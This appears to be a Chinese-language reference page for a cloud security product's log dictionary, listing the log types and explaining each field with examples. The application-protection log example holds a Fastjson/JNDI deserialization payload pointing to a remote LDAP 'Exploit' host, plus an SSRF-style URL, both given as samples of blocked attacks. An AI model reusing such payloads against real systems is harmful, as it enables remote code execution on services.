查看云安全中心日志可以帮您及时发现、调查和响应安全事件。购买日志分析存储容量后,云安全中心会默认开启安全日志、网络日志、主机日志,分别记录系统中的安全事件、网络流量情况和主机的活动。本文介绍云安全中心日志字典V2.0支持的日志类型以及每种日志类型的字段说明。
不同版本支持记录的日志类型
云安全中心不同版本支持的安全能力不同,可记录的日志类型不同。全量购买场景下,根据您购买的云安全中心版本记录支持的日志类型。非全量购买场景下(支持授权数管理),按照服务器绑定的版本记录服务器中对应的日志类型。不同版本支持记录的日志类型如下:
版本 | 支持记录的日志类型 |
企业版、旗舰版 | 云安全中心支持的所有日志类型。 |
防病毒版、高级版 | 所有主机日志和安全日志。 |
未绑定授权服务器 |
|
日志分类
网络日志
全球(不含中国)区域不支持查看网络日志。
日志类型 | __topic__ | 描述 | 采集周期 |
sas-log-http | 记录用户请求Web服务器和Web服务器响应的日志,包括HTTP请求的详细信息,例如用户IP地址、请求时间、请求方法、请求URL、HTTP状态码、响应大小等。 Web访问日志通常用于分析Web流量和用户行为、识别访问模式和异常情况、优化网站性能等。 | 数据延迟采集,延迟时间一般为:1~12小时 | |
sas-log-dns | 记录DNS解析过程详细信息的日志,包括请求域名、查询类型、客户端IP地址、响应值等信息。 通过分析DNS解析日志,您可以了解DNS解析的请求和响应过程,检测异常的解析行为、DNS劫持、DNS污染等问题。 | ||
sas-log-session | 记录网络连接和数据传输的日志,包括网络会话的详细信息,例如会话开始时间、双方IP地址、使用的协议和端口等。 网络会话日志通常用于监控网络流量、识别潜在威胁、优化网络性能等。 | ||
local-dns | 记录在本地DNS服务器上的DNS查询和响应的日志,包括本地DNS请求和响应的详细信息,例如请求域名、查询类型、客户端IP地址、响应值等。 通过本地DNS日志,您可以了解网络中的DNS查询活动,检测异常的查询行为、域名劫持和DNS污染等问题 |
主机日志
日志类型 | __topic__ | 描述 | 采集周期 |
aegis-log-login | 记录用户登录服务器的日志,包括登录时间、登录用户、登录方式、登录IP地址等信息。 登录流水日志可以帮助您监控用户的活动,及时识别和响应异常行为,从而保障系统的安全性。 说明 云安全中心不支持Windows Server 2008操作系统的登录流水日志。 | 实时采集。 | |
aegis-log-network | 记录网络连接活动的日志,包括服务器连接五元组、连接时间、连接状态等信息。 网络连接日志可以帮助您发现异常连接行为,识别潜在的网络攻击,优化网络性能等。 说明
| 实时采集。 | |
aegis-log-process | 记录服务器上进程启动相关的日志,包括进程启动时间、启动命令、参数等信息。 通过记录和分析进程启动日志,您可以了解系统中进程的启动情况和配置信息,检测异常进程活动、恶意软件入侵和安全威胁等问题。 | 实时采集,进程启动立刻上报。 | |
aegis-log-crack | 记录暴力破解行为的日志,包括尝试登录及破解系统、应用程序或账号的信息。 通过记录和分析暴力破解日志,您可以了解系统或应用程序受到的暴力破解攻击,检测异常的登录尝试、弱密码和凭证泄露等问题。暴力破解日志还可以用于追踪恶意用户和取证分析,协助安全团队进行事件响应和调查工作。 | 实时采集。 | |
aegis-snapshot-host | 记录系统或应用程序中用户账号详细信息的日志,包括账号的基本属性,例如用户名、密码策略、登录历史等。 通过比较不同时间点的账号快照日志,您可以了解用户账号的变化和演变情况,及时检测潜在的账号安全问题,例如未授权的账号访问、异常的账号状态等。 |
| |
aegis-snapshot-port | 记录网络连接的日志,包括连接五元组、连接状态及关联的进程信息等字段。 通过记录和分析网络连接快照日志,您可以了解系统中活动的网络套接字情况,帮助您发现异常连接行为,识别潜在的网络攻击,优化网络性能等。 | ||
aegis-snapshot-process | 记录系统中进程活动的日志,包括进程ID、进程名称、进程启动时间等信息。 通过记录和分析进程快照日志,您可以了解系统中进程的活动情况、资源占用情况,检测异常进程、CPU占用和内存泄露等问题。 | ||
aegis-log-dns-query | 记录DNS查询请求的日志,包括服务器发送DNS查询请求的详细信息,例如查询的域名、查询类型、查询来源等信息。 通过分析DNS请求日志,您可以了解网络中的DNS查询活动,检测异常的查询行为、域名劫持和DNS污染等问题。 说明 针对内核版本低于4.X.X系列的Linux服务器,云安全中心不支持DNS请求日志的采集及恶意DNS行为的检测。建议您考虑升级系统内核至更高版本,以此来获得全面的威胁检测功能。 | 实时采集。 | |
aegis-log-client | 记录云安全中心客户端的上线和离线事件。 | 实时采集。 |
安全日志类型
日志类型 | __topic__ | 描述 | 采集周期 |
sas-vul-log | 记录系统或应用程序中发现的漏洞相关信息的日志,包括漏洞名称、漏洞状态、处理动作等信息。 通过记录和分析漏洞日志,您可以了解系统中存在的漏洞情况、安全风险和攻击趋势,及时采取相应的补救措施。 | 实时采集。 | |
sas-hc-log | 记录基线风险检查结果的日志,包括基线等级、基线类别、风险等级等信息。 通过记录和分析基线风险日志,您可以了解系统的基线安全状态和潜在的风险。 说明 仅记录首次出现且未通过的检查项数据,以及历史检测中已通过但重新检测后未通过的检查项数据。 | ||
sas-security-log | 记录系统或应用程序中发生的安全事件和告警信息的日志,包括告警数据源、告警详情、告警等级等信息。 通过记录和分析安全告警日志,您可以了解系统中的安全事件和威胁情况,及时采取相应的响应措施。 | ||
sas-cspm-log | 记录云平台配置检查相关的日志,包括云平台配置检查的检查结果、加白操作等信息。 通过记录和分析云平台配置检查日志,您可以了解云平台中存在的配置问题和潜在的安全风险。 | ||
sas-net-block | 记录网络攻击事件的日志,包括攻击类型、源IP地址、目标IP地址等关键信息。 通过记录和分析网络防御日志,您可以了解网络中发生的安全事件,进而采取相应的响应和防御措施,提高网络的安全性和可靠性。 | ||
sas-rasp-log | 记录应用防护功能的攻击告警信息的日志,包括攻击类型、行为数据、攻击者IP等关键信息。 通过记录和分析应用防护告警日志,您可以了解应用程序中发生的安全事件,进而采取相应的响应和防御措施,提高应用程序的安全性和可靠性。 | ||
sas-filedetect-log | 记录使用恶意文件检测SDK功能进行恶意文件检测的日志,包括恶意文件检测的文件信息、检测场景、检测结果等信息。 通过记录和分析恶意文件检测日志,您可以识别离线文件和阿里云OSS文件中存在的常见病毒,例如勒索病毒、挖矿程序等,及时处理以防止恶意文件传播和执行。 |
网络日志字段说明
仅云安全中心企业版、旗舰版支持网络日志。
Web访问日志
字段名 | 说明 | 示例 |
response_content_length | 返回的消息实体的长度。单位为:Byte。 | 612 |
dst_ip | 目标主机的IP地址。 | 39.105.XX.XX |
dst_port | 目标主机的端口。 | 80 |
host | 访问的对向主机的IP地址或域名。 | 39.105.XX.XX |
jump_location | 重定向地址。 | 123 |
request_method | HTTP请求方式。 | GET |
http_referer | 客户端向服务器发送请求时的HTTP referer,告知服务器访问来源的HTTP连接。 | www.example.com |
request_datetime | 请求时间。 | 2024-08-01 06:59:28 |
status | 服务器对请求的响应状态码。 | 200 |
content_type | 请求内容类型。 | text/plain;charset=utf-8 |
response_content_type | 响应内容类型。 | text/plain; charset=utf-8 |
src_ip | 访问源的IP地址。 | 31.220.XX.XX |
src_port | 访问源的端口。 | 59524 |
request_uri | 请求URI。 | /report |
http_user_agent | 向客户端发起的请求。 | okhttp/3.2.0 |
http_x_forward_for | HTTP请求头字段,记录客户端的真实IP地址。 | 31.220.XX.XX |
DNS解析日志
字段名 | 说明 | 示例 |
additional | DNS服务器返回的附加资源记录的信息,例如CNAME记录、MX记录、PTR记录等。 | 无 |
additional_num | DNS服务器返回的附加资源记录的数量。 | 0 |
answer | DNS服务器返回的回答信息,指示查询主机的具体解析结果。回答信息包含了请求域名对应的IP地址或其他相关信息,例如A记录、AAAA记录等。 | example.com A IN 52 1.2.XX.XX |
answer_num | DNS服务器返回的回答信息的数量。 | 1 |
authority | DNS服务器返回的权威记录信息,指示负责管理和提供该域名解析的DNS服务器。权威记录包含了对请求域名进行授权的DNS服务器的信息,例如NS记录。 | NS IN 17597 |
authority_num | DNS服务器返回的权威记录的数量。 | 1 |
client_subnet | DNS客户端的子网掩码信息。 | 59.152.XX.XX |
dst_ip | 目的IP。 | 106.55.XX.XX |
dst_port | 目的端口。 | 53 |
net_connect_dir | DNS请求的数据传输方向,取值:
| out |
qid | 查询ID。 | 13551 |
query_name | DNS解析请求的查询域名。 | example.com |
query_type | DNS解析请求的查询类型。 | A |
query_datetime | DNS解析请求的时间。 | 2024-08-01 08:33:58 |
rcode | DNS服务器返回的响应代码,指示DNS解析结果。 | 0 |
region | 来源地域ID。取值:
| 1 |
response_datetime | DNS服务器返回响应的时间。 | 2024-08-01 08:31:25 |
src_ip | 源IP地址。 | 106.11.XX.XX |
src_port | 源端口。 | 22 |
网络会话日志
字段名 | 说明 | 示例 |
asset_type | 产生日志的资产。取值:
| ECS |
dst_ip | 目标IP地址。 | 119.96.XX.XX |
dst_port | 目标端口。 | 443 |
net_connect_dir | 网络会话的数据传输方向。固定取值为out。
| out |
l4_proto | 协议类型。取值:
| tcp |
session_time | 网络会话的开始时间。 | 2024-08-01 08:31:18 |
src_ip | 源IP地址。 | 121.40.XX.XX |
src_port | 源端口。 | 53602 |
本地DNS日志
字段名 | 说明 | 示例 |
anwser_name | DNS回答的记录名称,表示与资源记录关联的域名。 | example.com |
answer_rdata | DNS回答的RDA(Resource Data Area)字段,表示解析结果的具体值。 | 106.11.XX.XX |
answer_ttl | DNS回答的TTL(Time to Live)字段,表示解析结果的生存时间,单位为秒。 | 600 |
answer_type | DNS响应的记录类型,以下是常见的DNS响应类型取值:
| 1 |
dst_ip | 目的IP地址,表示请求发往的IP地址,默认为十进制IP地址格式。 | 323223**** |
dst_port | 目的端口,表示请求发往的端口号。 | 53 |
group_id | 分组ID。相同的分组ID表示相同的DNS请求或响应。 | 3 |
host | 主机名。 | hostname |
id | 查询ID,用于唯一标识DNS请求或响应。 | 64588 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | DNS请求或响应的公网IP地址。 | 121.40.XX.XX |
ip_ttl | DNS请求或响应中IP数据包的TTL值。 | 64 |
query_name | 查询的域名。 | example.com |
query_type | DNS解析请求的查询类型。取值:
| 1 |
src_ip | 发起DNS请求或响应的IP地址,默认为十进制IP地址格式。 | 168427**** |
src_port | 发起DNS请求或响应的端口号。 | 53 |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
time_usecond | DNS请求或响应的时间戳,单位为微秒。 | 590662 |
tunnel_id | DNS请求或响应所使用的隧道ID,用于唯一标识一个网络隧道。网络隧道是一种通过不同的网络协议来传输数据的方式,可以用于安全访问互联网或跨越不同网络的通信。 | 514763 |
主机日志字段说明
登录流水日志
字段名 | 说明 | 示例 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器的IP地址。 | 192.168.XX.XX |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | 登录服务器的IP地址。 | 221.11.XX.XX |
dst_port | 登录服务器的端口。 | 22 |
login_type | 登录类型。取值包括但不限于:
| SSH |
username | 登录用户名。 | admin |
login_count | 登录次数。 1分钟内重复登录会被合并为1条日志,例如 | 3 |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
网络连接日志
字段名 | 说明 | 示例 |
cmd_chain | 进程链。 | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | 进程链索引,可以通过相同索引查找进程链。 | B184 |
container_hostname | 容器内服务器名称。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | 容器ID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | 镜像ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | 镜像名称。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | 容器名称。 | nginx-ingress-**** |
container_pid | 容器内进程ID。 | 0 |
net_connect_dir | 网络连接方向。取值:
| in |
dst_ip | 网络连接接收者的IP。
| 192.168.XX.XX |
dst_port | 网络连接接收者的端口。 | 443 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
parent_proc_name | 父进程的文件名。 | /usr/bin/bash |
pid | 进程ID。 | 14275 |
ppid | 父进程ID。 | 14268 |
proc_name | 进程名。 | nginx |
proc_path | 进程路径。 | /usr/local/nginx/sbin/nginx |
proc_start_time | 进程的启动时间。 | N/A |
connection_type | 协议。取值:
| tcp |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
src_ip | 源IP地址。 | 100.127.XX.XX |
src_port | 源端口。 | 41897 |
srv_comm | 父进程的父进程关联的命令名。 | containerd-shim |
status | 网络连接状态。取值:
| 5 |
type | 实时网络连接的类型。取值:
| listen |
uid | 进程用户的ID。 | 101 |
username | 进程的用户名。 | root |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
进程启动日志
字段名 | 说明 | 示例 |
cmd_chain | 进程链。 | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | 进程链索引,可以通过相同索引查找进程链。 | B184 |
cmd_index | 命令行每个参数的索引,每两个为一组,标识一个参数的起止索引。 | 0,3,5,8 |
cmdline | 进程启动的完整命令行。 | ipset list KUBE-6-CLUSTER-IP |
comm | 进程关联的命令名。 | N/A |
container_hostname | 容器内服务器名称。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | 容器ID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | 镜像ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | 镜像名称。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | 容器名称。 | nginx-ingress-**** |
container_pid | 容器内进程ID。 | 0 |
cwd | 进程运行目录。 | N/A |
proc_name | 进程文件名。 | ipset |
proc_path | 进程文件完整路径。 | /usr/sbin/ipset |
gid | 进程组的ID。 | 0 |
groupname | 用户组。 | group1 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
parent_cmd_line | 父进程的命令行。 | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | 父进程文件名。 | kube-proxy |
parent_proc_path | 父进程文件完整路径。 | /usr/local/bin/kube-proxy |
pid | 进程ID。 | 14275 |
ppid | 父进程ID。 | 14268 |
proc_start_time | 进程启动时间。 | 2024-08-01 16:45:40 |
parent_proc_start_time | 父进程的启动时间。 | 2024-07-12 19:45:19 |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
srv_cmd | 祖进程的命令行。 | /usr/bin/containerd |
tty | 登录的终端。N/A表示账号从未登录过终端。 | N/A |
uid | 用户ID。 | 123 |
username | 进程的用户名。 | root |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
暴力破解日志
字段名 | 说明 | 示例 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 被暴力破解的服务器IP地址。 | 192.168.XX.XX |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
uuid | 被暴力破解的服务器UUID。 | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | 失败登录次数。 1分钟内重复登录会被合并为1条日志,例如 | 3 |
src_ip | 登录来源IP地址。 | 47.92.XX.XX |
dst_port | 登录端口。 | 22 |
login_type | 登录类型。取值:
| SSH |
username | 登录用户名。 | user |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
账号快照日志
字段名 | 说明 | 示例 |
account_expire | 账号的过期时间。never表示永不过期。 | never |
domain | 账号所在的域或目录服务。N/A表示不属于任何域。 | N/A |
groups | 账号所在的分组。N/A表示不属于任何组。 | ["nscd"] |
home_dir | 主目录,系统中存储和管理文件的默认位置。 | /Users/abc |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
last_chg | 最后一次修改密码的日期。 | 2022-11-29 |
last_logon | 最后一次登录账号的日期和时间。N/A表示从未登录过。 | 2023-08-18 09:21:21 |
login_ip | 最后一次登录账号的远程IP地址。N/A表示从未登录过。 | 192.168.XX.XX |
passwd_expire | 密码的过期日期。never表示永不过期。 | 2024-08-24 |
perm | 是否拥有root权限。取值:
| 0 |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
shell | Linux的Shell命令。 | /sbin/nologin |
status | 用户账号的状态,取值:
| 0 |
tty | 登录的终端。N/A表示账号从未登录过终端。 | N/A |
username | 用户名称。 | nscd |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | 密码到期提醒日期。never表示永不提醒。 | 2024-08-20 |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
网络快照日志
字段名 | 说明 | 示例 |
net_connect_dir | 网络连接方向。取值:
| in |
dst_ip | 网络连接接收者的IP。
| 192.168.XX.XX |
dst_port | 网络连接接收者的端口。 | 443 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
pid | 进程ID。 | 682 |
proc_name | 进程名。 | sshd |
connection_type | 协议。取值:
| tcp4 |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
src_ip | 源IP地址。 | 100.127.XX.XX |
src_port | 源端口。 | 41897 |
status | 网络连接状态。取值:
| 5 |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
进程快照日志
字段名 | 说明 | 示例 |
cmdline | 进程启动的完整命令行。 | /usr/local/share/assist-daemon/assist_daemon |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
md5 | 二进制文件的MD5哈希值。 说明 超过1 MB的进程文件不进行MD5计算。 | 1086e731640751c9802c19a7f53a64f5 |
proc_name | 进程文件名。 | assist_daemon |
proc_path | 进程文件完整路径。 | /usr/local/share/assist-daemon/assist_daemon |
pid | 进程ID。 | 1692 |
pname | 父进程文件名。 | systemd |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
proc_start_time | 进程启动时间。内置字段。 | 2023-08-18 20:00:12 |
uid | 进程用户的ID。 | 101 |
username | 进程的用户名。 | root |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
DNS请求日志
字段名 | 说明 | 示例 |
domain | DNS请求对应的域名。 | example.aliyundoc.com |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | 发起DNS请求的服务器IP地址。 | 192.168.XX.XX |
pid | 发起DNS请求的进程ID。 | 3544 |
ppid | 发起DNS请求的父进程ID。 | 3408 |
cmd_chain | 发起DNS请求的进程链。 | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | 发起DNS请求的命令行。 | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | 发起DNS请求的进程路径。 | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
time | 捕获DNS请求事件的时间,该时间一般和DNS请求发生时间相同。 | 2023-08-17 20:05:04 |
uuid | 发起DNS请求的服务器UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
客户端事件日志
字段名 | 说明 | 示例 |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | 服务器IP地址。 | 192.168.XX.XX |
agent_version | 客户端版本。 | aegis_11_91 |
last_login | 上次登录的时间戳。单位:毫秒。 | 1716444387617 |
platform | 操作系统类型。取值:
| linux |
region_id | 服务器所在地域ID。 | cn-beijing |
status | 客户端状态。取值:
| online |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
安全日志字段说明
漏洞日志
字段名 | 说明 | 示例 |
vul_alias_name | 漏洞别名。 | CESA-2023:1335: openssl Security Update |
risk_level | 风险等级。取值:
| later |
extend_content | 漏洞扩展信息。 | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | 资产的公网IP。 | 39.104.XX.XX |
intranet_ip | 资产的私网IP。 | 192.168.XX.XX |
instance_name | 主机名称。 | hhht-linux-*** |
vul_name | 漏洞名称。 | centos:7:cesa-2023:1335 |
operation | 漏洞的处理动作。取值:
| new |
status | 状态信息。取值:
| 1 |
tag | 漏洞的标签。取值:
| oval |
type | 漏洞类型。取值:
| sys |
uuid | 服务器UUID。 | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
基线日志
字段名 | 说明 | 示例 |
check_item_name | 检查项名称。 | 设置密码修改最小间隔时间 |
check_item_level | 基线的检查等级。取值:
| medium |
check_type | 检查项类型。 | 身份鉴别 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
risk_level | 风险项级别。取值:
| medium |
operation | 操作信息。取值:
| new |
risk_name | 风险项名称。 | 密码策略合规检测 |
sas_group_name | 检测出当前风险项的服务器在云安全中心的资产分组。 | default |
status | 状态信息。取值:
| 1 |
sub_type_alias_name | 子类型别名(中文)。 | 国际通用安全最佳实践-Ubuntu 16/18/20/22安全基线检查 |
sub_type_name | 基线子类型名称。基线子类型取值请参见基线类型及子类型列表。 | hc_ubuntu16_cis_rules |
type_alias_name | 类型别名(中文)。 | 国际通用安全最佳实践 |
type_name | 基线类型。基线类型取值请参见基线类型及子类型列表。 | cis |
uuid | 检测出当前风险项的服务器UUID。 | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
安全告警日志
字段名 | 说明 | 示例 |
data_source | 数据源。取值:
| aegis_login_log |
detail | 告警详情。 说明 告警类型不同,detail字段包含的内容也不同。如果您在查看告警日志时,对detail字段中的参数有疑问,您可以通过提交工单联系技术支持人员。 | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"西安市","type":"login_common_account","displayEventName":"ECS非常用账号登录","status":0} |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | 资产的公网IP。 | 39.104.XX.XX |
intranet_ip | 资产的私网IP。 | 192.168.XX.XX |
level | 告警事件的危险等级。取值:
| suspicious |
name | 告警名称。 | 异常登录-ECS非常用账号登录 |
operation | 操作信息。取值:
| new |
status | 告警的状态。取值:
| 1 |
unique_info | 告警的唯一标识。 | 2536dd765f804916a1fa3b9516b5**** |
uuid | 产生告警的服务器UUID。 | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
云平台配置检查日志
字段名 | 说明 | 示例 |
check_id | 检查项ID。您可以调用ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。 | 11 |
check_item_name | 检查项名称。 | 回源配置 |
instance_id | 实例ID。 | i-2zeg4zldn8zypsfg**** |
instance_name | 实例名称。 | lsm |
instance_result | 风险产生的影响。格式为JSON字符串。 | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | 实例的子类型。取值:
| INSTANCE |
instance_type | 实例类型。取值:
| ECS |
region_id | 实例所在地域ID。 | cn-hangzhou |
requirement_id | 条例ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。 | 5 |
risk_level | 风险级别。取值:
| MEDIUM |
section_id | 章节ID。您可以通过ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。 | 1 |
standard_id | 标准ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。 | 1 |
status | 检查项的状态。取值:
| PASS |
vendor | 所属云厂商。固定取值:ALIYUN。 | ALIYUN |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
网络防御日志
字段名 | 说明 | 示例 |
cmd | 被攻击的进程命令行。 | nginx: master process nginx |
cur_time | 攻击事件的发生时间。 | 2023-09-14 09:21:59 |
decode_payload | HEX格式转换为字符的payload。 | POST /Services/FileService/UserFiles/ |
dst_ip | 被攻击资产的IP地址。 | 172.16.XX.XX |
dst_port | 被攻击资产的端口。 | 80 |
func | 拦截事件的类型。取值:
| payload |
rule_type | 拦截事件的具体规则类型。取值:
| alinet_payload |
instance_id | 被攻击资产的实例ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | 被攻击资产的公网IP。 | 39.104.XX.XX |
intranet_ip | 被攻击资产的私网IP。 | 192.168.XX.XX |
final_action | 防御动作模式。取值:block(已拦截)。 | block |
payload | HEX格式的payload。 | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | 被攻击的进程ID。 | 7107 |
platform | 被攻击资产的系统类型。取值:
| linux |
proc_path | 被攻击的进程路径。 | /usr/sbin/nginx |
sas_group_name | 服务器在云安全中心的资产分组。 | default |
src_ip | 发起攻击的源IP地址。 | 106.11.XX.XX |
src_port | 发起攻击的源端口。 | 29575 |
uuid | 服务器的UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 开始时间戳,单位秒, 也用于表示事件发生的时间。 | 1719472214 |
应用防护日志
字段名 | 说明 | 示例 |
app_dir | 应用所在目录。 | /usr/local/aegis/rasp/apps/1111 |
app_id | 应用ID。 | 6492a391fc9b4e2aad94**** |
app_name | 应用名称。 | test |
confidence_level | 检测算法的置信度。取值:
| low |
request_body | 请求体信息。 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | 请求体长度。 | 112 |
data | hook点参数。 | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | 请求头信息。 | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | 主机或网络设备的名称。 | testhostname |
host_ip | 主机私网IP地址。 | 172.16.XX.XX |
is_cliped | 该条日志是否因为超长被裁剪过。取值:
| false |
jdk_version | JDK版本。 | 1.8.0_292 |
message | 告警描述信息。 | Unsafe class serial. |
request_method | 请求方法。 | Post |
platform | 操作系统类型。 | Linux |
arch | 操作系统架构。 | amd64 |
kernel_version | 操作系统内核版本。 | 3.10.0-1160.59.1.el7.x86_64 |
param | 请求参数,常见格式包括:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | 有效攻击载荷。 | bash -c kill -0 -- -'31098' |
payload_length | 有效攻击载荷长度。 | 27 |
rasp_id | 应用防护探针唯一ID。 | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | 应用防护探针版本。 | 0.8.5 |
src_ip | 请求者IP地址。 | 172.0.XX.XX |
final_action | 告警处理结果。取值:
| block |
rule_action | 规则指定的告警处理方式。取值:
| block |
risk_level | 风险级别。取值:
| high |
stacktrace | 堆栈信息。 | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | 触发告警的时间。 | 2023-10-09 15:19:15 |
timestamp | 触发告警的时间戳,单位为毫秒。 | 1696835955070 |
type | 漏洞类型。取值:
| rce |
url | 请求URL。 | http://127.0.0.1:999/xxx |
rasp_attack_uuid | 漏洞UUID。 | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | 主机UUID。 | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | 主机公网IP地址。 | 1.2.XX.XX |
